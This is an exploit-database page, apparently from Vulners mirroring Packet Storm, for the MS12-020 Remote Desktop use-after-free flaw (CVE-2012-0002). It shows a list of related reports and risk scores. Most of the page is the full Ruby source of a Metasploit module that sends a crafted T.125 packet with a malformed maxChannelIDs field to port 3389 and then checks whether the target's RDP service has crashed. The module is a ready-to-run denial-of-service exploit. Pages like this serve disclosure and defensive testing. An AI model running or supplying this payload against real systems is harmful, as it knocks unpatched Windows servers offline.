MS12-020 Microsoft Remote Desktop Use-After-Free Denial of Service

🗓️ 31 Aug 2024 00:00:00Reported by Luigi Auriemma, jduck, Daniel Godas-Lopez, Alex Ionescu, metasploit.comType

packetstorm🔗 packetstormsecurity.com👁 179 Views

MS12-020 RDP Use-After-Free DoS vulnerability

Reporter	Title	Published	Views	Family All 33
GithubExploit	Alfred-TryHackMe-Walkthrough-Jenkins-Exploitation-Windows-Token-Privilege-Escalation	17 May 202623:23	–	githubexploit
0day.today	MS12-020 Microsoft RDP Vulnerability Exploit PoC	12 Mar 201200:00	–	zdt
Gitee	Exploit for Code Injection in Microsoft	27 Nov 202010:59	–	gitee
Gitee	Exploit for Code Injection in Microsoft	25 Nov 202023:04	–	gitee
Gitee	Exploit for Code Injection in Microsoft	17 Nov 202009:07	–	gitee
ATTACKERKB	CVE-2012-0002	13 Mar 201200:00	–	attackerkb
Circl	CVE-2012-0002	16 Mar 201200:00	–	circl
Check Point Advisories	Microsoft Windows Remote Desktop Protocol Code Execution (MS12-020; CVE-2012-0002)	13 Mar 201200:00	–	checkpoint_advisories
Check Point Advisories	Microsoft Windows Remote Desktop Protocol Code Execution (MS12-020) - Ver2 (CVE-2012-0002)	26 Mar 201500:00	–	checkpoint_advisories
CVE	CVE-2012-0002	13 Mar 201221:00	–	cve

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Auxiliary::Report  
include Msf::Exploit::Remote::Tcp  
include Msf::Auxiliary::Dos  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'MS12-020 Microsoft Remote Desktop Use-After-Free DoS',  
'Description' => %q{  
This module exploits the MS12-020 RDP vulnerability originally discovered and  
reported by Luigi Auriemma. The flaw can be found in the way the T.125  
ConnectMCSPDU packet is handled in the maxChannelIDs field, which will result  
an invalid pointer being used, therefore causing a denial-of-service condition.  
},  
'References' =>  
[  
[ 'CVE', '2012-0002' ],  
[ 'MSB', 'MS12-020' ],  
[ 'URL', 'http://www.privatepaste.com/ffe875e04a' ],  
[ 'URL', 'http://pastie.org/private/4egcqt9nucxnsiksudy5dw' ],  
[ 'URL', 'http://pastie.org/private/feg8du0e9kfagng4rrg' ],  
[ 'URL', 'http://stratsec.blogspot.com.au/2012/03/ms12-020-vulnerability-for-breakfast.html' ],  
[ 'EDB', '18606' ],  
[ 'URL', 'https://www.rapid7.com/blog/post/2012/03/21/metasploit-update/' ]  
],  
'Author' =>  
[  
'Luigi Auriemma',  
'Daniel Godas-Lopez', # Entirely based on Daniel's pastie  
'Alex Ionescu',  
'jduck',  
'#ms12-020' # Freenode IRC  
],  
'License' => MSF_LICENSE,  
'DisclosureDate' => '2012-03-16'  
))  
  
register_options(  
[  
Opt::RPORT(3389)  
])  
end  
  
def is_rdp_up  
begin  
connect  
disconnect  
return true  
rescue Rex::ConnectionRefused  
return false  
rescue Rex::ConnectionTimeout  
return false  
end  
end  
  
def run  
max_channel_ids = "\x02\x01\xff"  
  
pkt = ''+  
"\x03\x00\x00\x13" + # TPKT: version + length  
"\x0E\xE0\x00\x00" + # X.224 (connection request)  
"\x00\x00\x00\x01" +  
"\x00\x08\x00\x00" +  
"\x00\x00\x00" +  
"\x03\x00\x00\x6A" + # TPKT: version + length  
"\x02\xF0\x80" + # X.224 (connect-initial)  
"\x7F\x65\x82\x00" + # T.125  
"\x5E" +  
"\x04\x01\x01" + # callingDomainSelector  
"\x04\x01\x01" + # calledDomainSelector  
"\x01\x01\xFF" + # upwardFlag  
"\x30\x19" + # targetParameters  
max_channel_ids + # maxChannelIds  
"\x02\x01\xFF" + # maxUserIds  
"\x02\x01\x00" + # maxTokenIds  
"\x02\x01\x01" + # numPriorities  
"\x02\x01\x00" + # minThroughput  
"\x02\x01\x01" + # maxHeight  
"\x02\x02\x00\x7C" + # maxMCSPDUsize  
"\x02\x01\x02" + # protocolVersion  
"\x30\x19" + # minimumParameters  
max_channel_ids + # maxChannelIds  
"\x02\x01\xFF" + # maxUserIds  
"\x02\x01\x00" + # maxTokenIds  
"\x02\x01\x01" + # numPriorities  
"\x02\x01\x00" + # minThroughput  
"\x02\x01\x01" + # maxHeight  
"\x02\x02\x00\x7C" + # maxMCSPDUsize  
"\x02\x01\x02" + # protocolVersion  
"\x30\x19" + # maximumParameters  
max_channel_ids + # maxChannelIds  
"\x02\x01\xFF" + # maxUserIds  
"\x02\x01\x00" + # maxTokenIds  
"\x02\x01\x01" + # numPriorities  
"\x02\x01\x00" + # minThroughput  
"\x02\x01\x01" + # maxHeight  
"\x02\x02\x00\x7C" + # maxMCSPDUsize  
"\x02\x01\x02" + # protocolVersion  
"\x04\x82\x00\x00" + # userData  
"\x03\x00\x00\x08" + # TPKT: version + length  
"\x02\xF0\x80" + # X.224  
"\x28" + # T.125  
"\x03\x00\x00\x08" + # TPKT: version + length  
"\x02\xF0\x80" + # X.224  
"\x28" + # T.125  
"\x03\x00\x00\x08" + # TPKT: version + length  
"\x02\xF0\x80" + # X.224  
"\x28" + # T.125  
"\x03\x00\x00\x08" + # TPKT: version + length  
"\x02\xF0\x80" + # X.224  
"\x28" + # T.125  
"\x03\x00\x00\x08" + # TPKT: version + length  
"\x02\xF0\x80" + # X.224  
"\x28" + # T.125  
"\x03\x00\x00\x08" + # TPKT: version + length  
"\x02\xF0\x80" + # X.224  
"\x28" + # T.125  
"\x03\x00\x00\x08" + # TPKT: version + length  
"\x02\xF0\x80" + # X.224  
"\x28" + # T.125  
"\x03\x00\x00\x08" + # TPKT: version + length  
"\x02\xF0\x80" + # X.224  
"\x28" + # T.125  
"\x03\x00\x00\x0C" + # TPKT: version + length  
"\x02\xF0\x80" + # X.224  
"\x38\x00\x06\x03" + # T.125  
"\xF0" +  
"\x03\x00\x00\x09" + # TPKT: version + length  
"\x02\xF0\x80" + # X.224  
"\x21\x80" # T.125  
  
unless is_rdp_up  
print_error("#{rhost}:#{rport} - RDP Service Unreachable")  
return  
end  
  
connect  
print_status("#{rhost}:#{rport} - Sending #{self.name}")  
sock.put(pkt)  
Rex.sleep(3)  
disconnect  
print_status("#{rhost}:#{rport} - #{pkt.length.to_s} bytes sent")  
  
print_status("#{rhost}:#{rport} - Checking RDP status...")  
  
if is_rdp_up  
print_error("#{rhost}:#{rport} - RDP Service Unreachable")  
return  
else  
print_good("#{rhost}:#{rport} seems down")  
report_vuln({  
:host => rhost,  
:port => rport,  
:name => self.name,  
:refs => self.references,  
:info => "Module #{self.fullname} successfully crashed the target system via RDP"  
})  
end  
  
end  
end  
`

31 Aug 2024 00:00Current

7High risk

Vulners AI Score7

CVSS 29.3

EPSS0.87379